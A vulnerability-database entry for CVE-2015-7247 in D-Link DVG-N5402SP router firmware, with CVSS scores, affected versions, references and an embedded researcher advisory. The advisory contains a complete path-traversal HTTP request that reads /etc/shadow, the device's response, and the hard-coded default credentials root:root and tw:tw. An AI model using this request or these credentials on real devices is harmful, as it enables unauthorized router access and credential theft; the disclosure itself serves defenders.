Details of VAR-201704-0220

ID

VAR-201704-0220

CVE

CVE-2015-7247

TITLE

D-Link DVG-N5402SP Vulnerability in which important information is obtained in the firmware of

Trust: 0.8

sources: JVNDB: JVNDB-2015-007545

DESCRIPTION

D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in the D-LinkDVG-N5402SP that originated from the program storing data in clear text. An attacker could exploit this vulnerability to obtain sensitive information. DLink DVGÂN5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVGN5402SP Web Management Model Name : GPN2.4P21CCN Firmware Version : W1000CN00 Firmware Version :W1000CN03 Firmware Version :W2000EN00 Hardware Platform :ZS Hardware Version :Gpn2.4P21C_WIFIV0.05 Device can be managed through three users: 1. super full privileges 2. admin full privileges 3. support restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgibin/webproc HTTP/1.1 Host: <IP>:8080 UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: http://<IP>:8080/cgibin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal>name:getpage; pstVal>value:html/main.html pstVal>name:getpage; pstVal>value:html/index.html pstVal>name:errorpage; pstVal>value:../../../../../../../../../../../etc/shadow pstVal>name:var:menu; pstVal>value:setup pstVal>name:var:page; pstVal>value:connected pstVal>name:var:subpage; pstVal>value: pstVal>name:objaction; pstVal>value:auth pstVal>name::username; pstVal>value:super pstVal>name::password; pstVal>value:super pstVal>name::action; pstVal>value:login pstVal>name::sessionid; pstVal>value:1ac5da6b Connection: close Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, HardCoded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login tw is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Trust: 2.7

sources: NVD: CVE-2015-7247 // JVNDB: JVNDB-2015-007545 // CNVD: CNVD-2016-01162 // BID: 82754 // VULHUB: VHN-85208 // VULMON: CVE-2015-7247 // PACKETSTORM: 135590

IOT TAXONOMY

category:

['IoT', 'Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2016-01162

AFFECTED PRODUCTS

vendor:	d link	model:	dvg-n5402sp	scope:	eq	version:	w1000cn-00	Trust: 2.4
vendor:	d link	model:	dvg-n5402sp	scope:	eq	version:	w1000cn-03	Trust: 2.4
vendor:	d link	model:	dvg-n5402sp	scope:	eq	version:	w2000en-00	Trust: 2.4
vendor:	d link	model:	dvg\303\202\302\255n5402sp	scope:	-	version:	-	Trust: 0.6

sources: CNVD: CNVD-2016-01162 // JVNDB: JVNDB-2015-007545 // CNNVD: CNNVD-201602-372 // NVD: CVE-2015-7247

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2015-7247
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2015-7247
value:	CRITICAL
Trust: 0.8
CNVD:	CNVD-2016-01162
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201602-372
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-85208
value:	HIGH
Trust: 0.1
VULMON:	CVE-2015-7247
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2015-7247
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2016-01162
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-85208
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2015-7247
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2016-01162 // VULHUB: VHN-85208 // VULMON: CVE-2015-7247 // JVNDB: JVNDB-2015-007545 // CNNVD: CNNVD-201602-372 // NVD: CVE-2015-7247

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.9

sources: VULHUB: VHN-85208 // JVNDB: JVNDB-2015-007545 // NVD: CVE-2015-7247

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-372

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201602-372

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007545

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85208 // VULMON: CVE-2015-7247

PATCH

title:

Top Page

url:

http://www.dlink.com/uk/en

Trust: 0.8

sources: JVNDB: JVNDB-2015-007545

EXTERNAL IDS

db:	NVD	id:	CVE-2015-7247	Trust: 3.6
db:	PACKETSTORM	id:	135590	Trust: 2.7
db:	EXPLOIT-DB	id:	39409	Trust: 1.8
db:	BID	id:	82754	Trust: 1.0
db:	JVNDB	id:	JVNDB-2015-007545	Trust: 0.8
db:	CNNVD	id:	CNNVD-201602-372	Trust: 0.7
db:	CNVD	id:	CNVD-2016-01162	Trust: 0.6
db:	VULHUB	id:	VHN-85208	Trust: 0.1
db:	VULMON	id:	CVE-2015-7247	Trust: 0.1

sources: CNVD: CNVD-2016-01162 // VULHUB: VHN-85208 // VULMON: CVE-2015-7247 // BID: 82754 // JVNDB: JVNDB-2015-007545 // PACKETSTORM: 135590 // CNNVD: CNNVD-201602-372 // NVD: CVE-2015-7247

REFERENCES

url:	http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html	Trust: 2.6
url:	http://seclists.org/fulldisclosure/2016/feb/24	Trust: 2.1
url:	https://www.exploit-db.com/exploits/39409/	Trust: 1.9
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7247	Trust: 0.9
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7247	Trust: 0.8
url:	http://www.securityfocus.com/bid/82754	Trust: 0.7
url:	http://www.dlink.co.in/	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/200.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7245	Trust: 0.1
url:	http://<ip>:8080/cgibin/webproc	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7246	Trust: 0.1

CREDITS

Karn Ganeshen

Trust: 1.0

sources: BID: 82754 // PACKETSTORM: 135590 // CNNVD: CNNVD-201602-372

SOURCES

db:	CNVD	id:	CNVD-2016-01162
db:	VULHUB	id:	VHN-85208
db:	VULMON	id:	CVE-2015-7247
db:	BID	id:	82754
db:	JVNDB	id:	JVNDB-2015-007545
db:	PACKETSTORM	id:	135590
db:	CNNVD	id:	CNNVD-201602-372
db:	NVD	id:	CVE-2015-7247

LAST UPDATE DATE

2025-04-20T23:13:14.342000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2016-01162	date:	2016-02-22T00:00:00
db:	VULHUB	id:	VHN-85208	date:	2017-04-28T00:00:00
db:	VULMON	id:	CVE-2015-7247	date:	2017-04-28T00:00:00
db:	BID	id:	82754	date:	2016-07-05T21:22:00
db:	JVNDB	id:	JVNDB-2015-007545	date:	2017-05-26T00:00:00
db:	CNNVD	id:	CNNVD-201602-372	date:	2023-04-27T00:00:00
db:	NVD	id:	CVE-2015-7247	date:	2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2016-01162	date:	2016-02-22T00:00:00
db:	VULHUB	id:	VHN-85208	date:	2017-04-24T00:00:00
db:	VULMON	id:	CVE-2015-7247	date:	2017-04-24T00:00:00
db:	BID	id:	82754	date:	2016-02-03T00:00:00
db:	JVNDB	id:	JVNDB-2015-007545	date:	2017-05-26T00:00:00
db:	PACKETSTORM	id:	135590	date:	2016-02-03T20:32:22
db:	CNNVD	id:	CNNVD-201602-372	date:	2016-02-19T00:00:00
db:	NVD	id:	CVE-2015-7247	date:	2017-04-24T18:59:00.240